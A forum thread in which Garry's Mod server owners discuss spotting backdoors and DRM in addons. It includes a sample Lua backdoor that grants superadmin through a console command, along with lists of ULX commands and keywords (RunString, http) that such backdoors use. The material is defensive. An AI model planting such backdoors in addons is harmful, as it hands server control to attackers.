How To Check For DRMS?

DRM really isn't an issue as much as it was beforehand, the thing you really want to look for is backdoors things like this (although this is an extremely simple example)
watch for lines that force the server tosv_allowcslua

Other things you want to watch for in illicit scripts:

ULX examples(some of theses usualy tied with concommand):

ulx adduser* <player> <group>
ulx unban <steamid>
ulx rcon {command}
ulx luarun* {command}
ulx cexec* <players>

Evolve examples(other hooks that target specificranks)
ply:EV_IsRespected
ply:EV_IsAdminply
ply:EV_IsSuperAdmin
ply:EV_IsOwner.

Make sure your going through the addon with a fine tooth comb. undestandwhat the addon is to do and always be suspicious

27-12-2018, 11:43 PM

Aceband Wrote: DRM really isn't an issue as much as it was beforehand, the thing you really want to look for is backdoors things like this (although this is an extremely simple example)

Code:

concommand.Add("obvliously_not_a_backdoor", function(player)
player:SetUserGroup("superadmin")
end)

watch for lines that force the server tosv_allowcslua

Other things you want to watch for in illicit scripts:

ULX examples(some of theses usualy tied with concommand):

ulx adduser* <player> <group>
ulx unban <steamid>
ulx rcon {command}
ulx luarun* {command}
ulx cexec* <players>

Evolve examples(other hooks that target specificranks)
ply:EV_IsRespected
ply:EV_IsAdminply
ply:EV_IsSuperAdmin
ply:EV_IsOwner.

Make sure your going through the addon with a fine tooth comb. undestandwhat the addon is to do and always be suspicious

But aren't DRMS still affecting players with their leaks? and Is there a way to find scripts that forcesv_allowcslua or do I have to go code through the code looking for anyhting like that? ......

But basically the code you listed was for a player to join my server and use that command and change their rank and to possibly ban everyone right? but codes like that could be used for more malicious intent.

Sorry for all the questions I am new to this and I want to get a better understanding so I know how to look for suspicious coding.

Quote:But aren't DRMS still affecting players with their leaks

Somewhat, it really depends on the mod. Usually,you can tell from the SF page to find. For example,
https://www.gmodstore.com/market/view/6007 had DRM.

https://www.gmodstore.com/market/view/6011 does not (from what I can tell)

Its been a while since I was messing around with script fodder and got some kid banned for leaking his scripts (lol) so I haven'tbeen around SF for a second. But to essentiallyremove DRM you would have to reverse engineer the addon. Older DRM is easy to remove, It really depends on how it is implementedand how embeddedthe code is.

Quote:Is there a way to find scripts that forcesv_allowcsluaor do I have to go code through the code looking foranyhtinglike that? ......

Unfortunately,you will have to comb through every inch of code to find it. Some are obvious. others can be Very well hidden.

Quote:But basically the code you listed was for a player to join my server and use that command and change their rank and to possibly ban everyone right? but codes like that could be used for more malicious intent.

Essentiallywhat this code is saying:

When the player types the "obvliously_not_a_backdoor" into con it will run the function that calls both"player" and "set usergroupto x"
this is a very very basic iteriationof this. but it indeed does exactly what you said. the player now has admin and can do whatever they want (ie banning everyone)

and yes of course they can be used for more malicious intent (i.e. wiping sql, fucking up your settings, gaining Rcon access)

Quote:Sorry for all the questions I am new to this and I want to get a better understanding so I know how to look for suspicious coding.

Ask away man ill be happy to answer any questions

30-12-2018, 02:28 AM

Aceband Wrote: Somewhat, it really depends on the mod. Usually,you can tell from the SF page to find. For example,
https://www.gmodstore.com/market/view/6007 had DRM.

https://www.gmodstore.com/market/view/6011 does not (from what I can tell)

Its been a while since I was messing around with script fodder and got some kid banned for leaking his scripts (lol) so I haven'tbeen around SF for a second. But to essentiallyremove DRM you would have to reverse engineer the addon. Older DRM is easy to remove, It really depends on how it is implementedand how embeddedthe code is.

Unfortunately,you will have to comb through every inch of code to find it. Some are obvious. others can be Very well hidden.







Essentiallywhat this code is saying:

Code:

concommand.Add("obvliously_not_a_backdoor", function(player)
player:SetUserGroup("superadmin")
end)

When the player types the "obvliously_not_a_backdoor" into con it will run the function that calls both"player" and "set usergroupto x"
this is a very very basic iteriationof this. but it indeed does exactly what you said. the player now has admin and can do whatever they want (ie banning everyone)

and yes of course they can be used for more malicious intent (i.e. wiping sql, fucking up your settings, gaining Rcon access)


Ask away man ill be happy to answer any questions

Okay! I understand now! My biggest question is, how do I check for backdoors without combing through everything, is there like a script/addon/scanner? I know about nomalua_scan but in your opinion what is the best and efficient one out there? Do you got any recommendations? Also, my last and final question is what files should I check for the most? I am guessing luafiles right?

You can find it in scripts with the help of key phrases : RunStrign or sometimes they obfuscatory and take creaking from the server (can be found for the phrase http)

Runstring and concommand is various types of backdoors. u can find them with nomalua scripte asyly

I would recommend searching for the backdoor scanner on GitHub. It will look for most backdoors for you. In regards to DRM removal that is something I am not experienced in.